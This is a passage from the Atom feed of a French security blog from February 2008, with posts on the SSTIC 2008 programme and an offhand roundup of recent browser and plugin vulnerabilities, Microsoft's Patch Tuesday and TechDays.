href="http://www.sstic.org/SSTIC08/programme.do#AUMAITRE"&gt;forensics mémoire sous Windows&lt;/a&gt;, et la &lt;a href="http://esec.fr.sogeti.com/seminaire/index.php#forensics"&gt;collecte de traces&lt;/a&gt; sur un poste de travail éteint. C'est bien de voir ses idées grandir.&lt;br /&gt;--&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-8887095810596080571?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/8887095810596080571/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=8887095810596080571' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8887095810596080571'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8887095810596080571'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/02/le-programme-du-sstic-2008-est-en-ligne.html' title='Le programme du SSTIC 2008 est en ligne'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-2747461541873043831</id><published>2008-02-08T22:24:00.000+01:00</published><updated>2008-02-08T22:43:41.702+01:00</updated><title type='text'>On est vendredi soir et je suis oisif ...</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/buffer-overflow.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/buffer-overflow.jpg" alt="" border="0" /&gt;&lt;/a&gt;Alors en vrac :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Il n'y a jamais eu autant de failles "client" dans la nature : FireFox (pre-2.0.0.12), QuickTime (pre-7.4.1), Acrobat Reader (pre-8.1.2), ... Ca devient difficile de surfer tranquillement sur le Web 2.0 (sauf avec Vista 64 et DEP &lt;span style="font-style: italic;"&gt;AlwaysOn&lt;/span&gt; bien sûr :)&lt;/li&gt;&lt;li&gt;D'ailleurs le &lt;span style="font-style: italic;"&gt;Patch Tuesday&lt;/span&gt; de février va être une sorte de &lt;span style="font-style: italic;"&gt;Super Tuesday&lt;/span&gt; : 12 patches dont 7 critiques, avec une exploitation de code à distance sur toutes les versions de IIS ... Et le parc des 200 machines de démo des TechDays qui va rester non patché ... C'est mâââl ...&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Non je n'étais pas à la soirée &lt;a href="http://blogs.technet.com/mstechdays/archive/2007/12/20/que-se-passe-t-il-dans-les-vib-party-de-microsoft.aspx"&gt;VIB&lt;/a&gt; (&lt;span style="font-style: italic;"&gt;Very Important Bloggers&lt;/span&gt;) des TechDays ... Trop de &lt;span style="font-style: italic;"&gt;goodies&lt;/span&gt; peut-être ...&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Vu sur le site des TechDays d'ailleurs : le responsable des licences logicielles chez Microsoft France s'appelle Monsieur &lt;a href="http://blogs.technet.com/mstechdays/archive/2008/02/08/les-licences-s-invitent-aux-microsoft-techdays.aspx"&gt;Bourreau&lt;/a&gt;. Ca donne envie.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;De toute façon, après avoir vu &lt;a href="http://members.microsoft.com/careers/search/details.aspx?JobID=35185FC3-3966-4A69-BE9C-F34C86F36068"&gt;ça&lt;/a&gt;, je ne suis pas sûr que bosser chez Microsoft soit un bon plan ... (prêtez attention au témoignage de &lt;span style="font-style: italic;"&gt;l'insider&lt;/span&gt;).&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/job-microsoft.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 600px;" src="http://newsoft.dyndns.org/blog/job-microsoft.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-2747461541873043831?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/2747461541873043831/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=2747461541873043831' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2747461541873043831'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2747461541873043831'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/02/on-est-vendredi-soir-et-je-suis-oisif.html' title='On est vendredi soir et je suis oisif ...'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-5947311684954351342</id><published>2008-02-06T13:05:00.002+01:00</published><updated>2008-02-14T09:37:33.178+01:00</updated><title type='text'>Je leake comme une vieille chaudière</title><content type='html'>(C'est faux, mais j'aime b
